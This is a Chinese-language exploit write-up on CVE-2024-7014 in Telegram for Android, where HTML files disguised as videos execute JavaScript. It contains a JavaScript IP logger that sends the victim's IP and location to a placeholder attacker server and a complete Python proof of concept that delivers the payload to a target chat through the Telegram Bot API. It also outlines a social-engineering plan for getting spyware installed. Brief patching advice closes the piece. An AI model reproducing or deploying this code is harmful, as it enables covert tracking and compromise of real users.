Telegram 的 CVE-2024-7014 漏洞解析与侦查应用

一、关于 Telegram 的 CVE-2024-7014 漏洞解析

漏洞作用CVE-2024-7014 是 Telegram Android 应用中的一个高危漏洞，核心问题在于服务器错误识别文件类型。攻击者可将恶意 HTML 文件（.htm）伪装成视频（如 .mp4），通过 Telegram 发送给用户。当用户尝试打开“视频”时，系统会调用浏览器加载该 HTML 文件，触发其中嵌入的恶意 JavaScript 代码，导致设备信息泄露（如 IP 地址）或远程下载恶意程序，进一步控制设备。

二、漏洞利用实例

1. 网络侦查：窃取用户 IP 地址

攻击者发送伪装成视频的 HTML 文件，其中包含以下 JavaScript 代码：

 1<script> 2fetch('http://ip-api.com/json') 3  .then(response => response.json()) 4  .then(data => { 5    fetch('http://攻击者服务器IP:端口/log_ip', { 6method: 'POST', 7headers: {'Content-Type': 'application/json'}, 8body: JSON.stringify({ ip: data.query, country: data.country }) 9    });10  });11</script>

当用户打开文件时，代码会获取其 IP、地理位置、ISP 信息，并发送至攻击者的服务器。

2. 网络攻防：诱导安装恶意软件

攻击者可结合漏洞发起多阶段攻击：  • 第一阶段：通过 IP 记录器定位受害者地理位置。  • 第二阶段：发送伪装成“视频修复工具”的恶意 APK，诱导用户安装（需结合社会工程话术，如“点击安装插件以播放视频”）。  • 第三阶段：恶意程序（如 Android/Spy.SpyMax.T）在后台窃取短信、通讯录，甚至远程控制设备。

三、漏洞利用的完整 POC

以下是基于 Python 的漏洞利用代码，演示如何通过 Telegram API 发送伪装成视频的恶意 HTML 文件：

 1import requests 2 3BOT_TOKEN = "你的Telegram Bot Token" 4CHAT_ID = "目标聊天ID" 5 6# 构造恶意 HTML（内含 IP 记录器） 7html_content = """<!DOCTYPE html> 8<html> 9<head>10    <script>11        fetch('http://ip-api.com/json')12          .then(response => response.json())13          .then(data => {14            fetch('http://攻击者服务器IP:端口/log_ip', {15              method: 'POST',16              headers: {'Content-Type': 'application/json'},17              body: JSON.stringify({ ip: data.query })18            });19          });20    </script>21</head>22<body></body>23</html>"""2425# 将 HTML 伪装成视频文件26with open("fake_video.mp4", "w") as file:27    file.write(html_content)2829# 通过 Telegram API 发送“视频”30files = {"video": ("a.htm", open("fake_video.mp4", "rb"), "video/mp4")}31url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendVideo"32data = {"chat_id": CHAT_ID, "supports_streaming": False}33response = requests.post(url, data=data, files=files)3435if response.status_code == 200:36    print("攻击载荷已发送！")37else:38    print(f"发送失败：{response.text}")

关键点：  • 文件扩展名伪装为 .mp4，但实际内容为 HTML。  • 利用 Telegram 的 sendVideo API 接口绕过类型校验。

在此代码中，“.htm”扩展名的内容被伪装成“视频”，并通过Telegram API发送。在Android设备上打开此文件的用户，实际上是在执行包含JavaScript的HTML页面。

以下视频展示了“恶意软件和IP记录器场景的实现方式：

四、修复与防御建议

1. 更新应用
   
   ：Telegram 已在 Android 10.14.5 及以上版本修复此漏洞，用户需立即升级。
2. 禁用自动下载
   
   ：在设置中关闭“自动下载媒体文件”功能，手动确认文件来源。
3. 警惕异常文件
   
   ：对“无法播放的视频”保持警惕，避免通过外部浏览器打开未知文件。